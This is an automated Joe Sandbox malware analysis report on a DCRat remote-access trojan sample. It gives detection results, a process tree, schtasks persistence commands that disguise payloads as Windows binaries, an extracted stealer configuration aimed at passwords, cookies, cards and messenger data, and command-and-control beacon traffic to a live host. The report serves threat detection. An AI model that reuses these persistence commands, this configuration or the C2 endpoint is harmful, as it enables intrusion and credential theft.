Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cDouNOFXle.exe

Overview

General Information

Sample Name:cDouNOFXle.exe
Analysis ID:679544
MD5:54172888b473f2515b13fe1e2032a112
SHA1:fc4ff4d53a1ea6cfee9265840bfc1dda0ee8c1e6
SHA256:05379ea4600304f51cffa8d1ee9e3b2931a69129f6bed14d45a500d966a71fca
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected DCRat
Creates processes via WMI
Machine Learning detection for sample
Machine Learning detection for dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
File is packed with WinRar
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • cDouNOFXle.exe (PID: 3632 cmdline: "C:\Users\user\Desktop\cDouNOFXle.exe" MD5: 54172888B473F2515B13FE1E2032A112)
    • wscript.exe (PID: 5792 cmdline: "C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • cmd.exe (PID: 5824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • chainsavesref.exe (PID: 3372 cmdline: C:\comproviderRuntimecommon\chainsavesref.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)
  • schtasks.exe (PID: 5100 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 2292 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5208 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5296 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 1100 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5284 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 11 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • MrsUvRPGeImAhc.exe (PID: 3432 cmdline: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)
  • schtasks.exe (PID: 3056 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 6 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 2232 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 6120 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5800 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\winlogon.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 4592 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • MrsUvRPGeImAhc.exe (PID: 2756 cmdline: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)
  • schtasks.exe (PID: 2072 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5100 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\explorer.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 2292 cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 4036 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 4200 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • explorer.exe (PID: 1820 cmdline: C:\Recovery\explorer.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)
  • schtasks.exe (PID: 5304 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • explorer.exe (PID: 5580 cmdline: C:\Recovery\explorer.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)
  • schtasks.exe (PID: 3896 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5280 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 6024 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5608 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 6056 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 2292 cmdline: schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • cleanup
{"SCRT": "{\"l\":\"@\",\"w\":\"#\",\"I\":\"`\",\"Y\":\"$\",\"M\":\"%\",\"i\":\",\",\"D\":\"&\",\"N\":\"-\",\"5\":\" \",\"P\":\"~\",\"s\":\")\",\"K\":\"*\",\"3\":\";\",\"m\":\"^\",\"c\":\">\",\"Q\":\"<\",\"2\":\"(\",\"S\":\"_\",\"O\":\"!\",\"y\":\".\",\"0\":\"|\"}", "PCRT": "{\"l\":\"|\",\"6\":\"&\",\"G\":\"<\",\"I\":\"^\",\"0\":\")\",\"p\":\"!\",\"y\":\",\",\"n\":\".\",\"X\":\"*\",\"M\":\"$\",\"=\":\">\",\"9\":\" \",\"b\":\"~\",\"S\":\";\",\"d\":\"@\",\"Y\":\"(\",\"c\":\"#\",\"w\":\"`\",\"i\":\"-\",\"e\":\"%\",\"j\":\"_\"}", "TAG": "FUCKYOUTEST", "MUTEX": "DCR_MUTEX-02ykwxZSRSiKYAzrbrFg", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
SourceRuleDescriptionAuthorStrings
00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 8 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: cDouNOFXle.exeVirustotal: Detection: 53%Perma Link
            Source: cDouNOFXle.exeMetadefender: Detection: 40%Perma Link
            Source: cDouNOFXle.exeReversingLabs: Detection: 60%
            Source: cDouNOFXle.exeAvira: detected
            Source: C:\Recovery\ShellExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1249330
            Source: C:\comproviderRuntimecommon\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1249330
            Source: C:\comproviderRuntimecommon\backgroundTaskHost.exeAvira: detection malicious, Label: HEUR/AGEN.1249330
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeAvira: detection malicious, Label: HEUR/AGEN.1249330
            Source: C:\Recovery\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1249330
            Source: C:\Recovery\explorer.exeAvira: detection malicious, Label: HEUR/AGEN.1249330
            Source: C:\comproviderRuntimecommon\chainsavesref.exeAvira: detection malicious, Label: HEUR/AGEN.1249330
            Source: C:\Recovery\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1249330
            Source: C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeAvira: detection malicious, Label: HEUR/AGEN.1249330
            Source: C:\Recovery\ShellExperienceHost.exeVirustotal: Detection: 54%Perma Link
            Source: C:\Recovery\ShellExperienceHost.exeReversingLabs: Detection: 70%
            Source: C:\Recovery\conhost.exeVirustotal: Detection: 54%Perma Link
            Source: C:\Recovery\conhost.exeReversingLabs: Detection: 70%
            Source: C:\Recovery\explorer.exeVirustotal: Detection: 54%Perma Link
            Source: C:\Recovery\explorer.exeReversingLabs: Detection: 70%
            Source: C:\Recovery\winlogon.exeVirustotal: Detection: 54%Perma Link
            Source: C:\Recovery\winlogon.exeReversingLabs: Detection: 70%
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeVirustotal: Detection: 54%Perma Link
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeReversingLabs: Detection: 70%
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeReversingLabs: Detection: 70%
            Source: C:\comproviderRuntimecommon\RuntimeBroker.exeReversingLabs: Detection: 70%
            Source: C:\comproviderRuntimecommon\backgroundTaskHost.exeReversingLabs: Detection: 70%
            Source: C:\comproviderRuntimecommon\chainsavesref.exeReversingLabs: Detection: 70%
            Source: cDouNOFXle.exeJoe Sandbox ML: detected
            Source: C:\Recovery\ShellExperienceHost.exeJoe Sandbox ML: detected
            Source: C:\comproviderRuntimecommon\RuntimeBroker.exeJoe Sandbox ML: detected
            Source: C:\comproviderRuntimecommon\backgroundTaskHost.exeJoe Sandbox ML: detected
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeJoe Sandbox ML: detected
            Source: C:\Recovery\winlogon.exeJoe Sandbox ML: detected
            Source: C:\Recovery\explorer.exeJoe Sandbox ML: detected
            Source: C:\comproviderRuntimecommon\chainsavesref.exeJoe Sandbox ML: detected
            Source: C:\Recovery\conhost.exeJoe Sandbox ML: detected
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeJoe Sandbox ML: detected
            Source: 0.3.cDouNOFXle.exe.5528b46.0.unpackAvira: Label: VBS/Runner.VPG
            Source: 0.3.cDouNOFXle.exe.5557b46.1.unpackAvira: Label: VBS/Runner.VPG
            Source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"l\":\"@\",\"w\":\"#\",\"I\":\"`\",\"Y\":\"$\",\"M\":\"%\",\"i\":\",\",\"D\":\"&\",\"N\":\"-\",\"5\":\" \",\"P\":\"~\",\"s\":\")\",\"K\":\"*\",\"3\":\";\",\"m\":\"^\",\"c\":\">\",\"Q\":\"<\",\"2\":\"(\",\"S\":\"_\",\"O\":\"!\",\"y\":\".\",\"0\":\"|\"}", "PCRT": "{\"l\":\"|\",\"6\":\"&\",\"G\":\"<\",\"I\":\"^\",\"0\":\")\",\"p\":\"!\",\"y\":\",\",\"n\":\".\",\"X\":\"*\",\"M\":\"$\",\"=\":\">\",\"9\":\" \",\"b\":\"~\",\"S\":\";\",\"d\":\"@\",\"Y\":\"(\",\"c\":\"#\",\"w\":\"`\",\"i\":\"-\",\"e\":\"%\",\"j\":\"_\"}", "TAG": "FUCKYOUTEST", "MUTEX": "DCR_MUTEX-02ykwxZSRSiKYAzrbrFg", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
            Source: cDouNOFXle.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: cDouNOFXle.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: cDouNOFXle.exe
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0007B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0008AAA8 FindFirstFileExA,
            Source: Joe Sandbox ViewIP Address: 141.8.195.65 141.8.195.65
            Source: global trafficHTTP traffic detected: GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0702220.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0702220.xsph.ru
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 05 Aug 2022 22:53:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 05 Aug 2022 22:53:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0702220.xsph.ru
            Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362379963.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0702220.xsph.ru/
            Source: MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0702220.xsph.ru/tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf
            Source: MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0702220.xsph.ru8
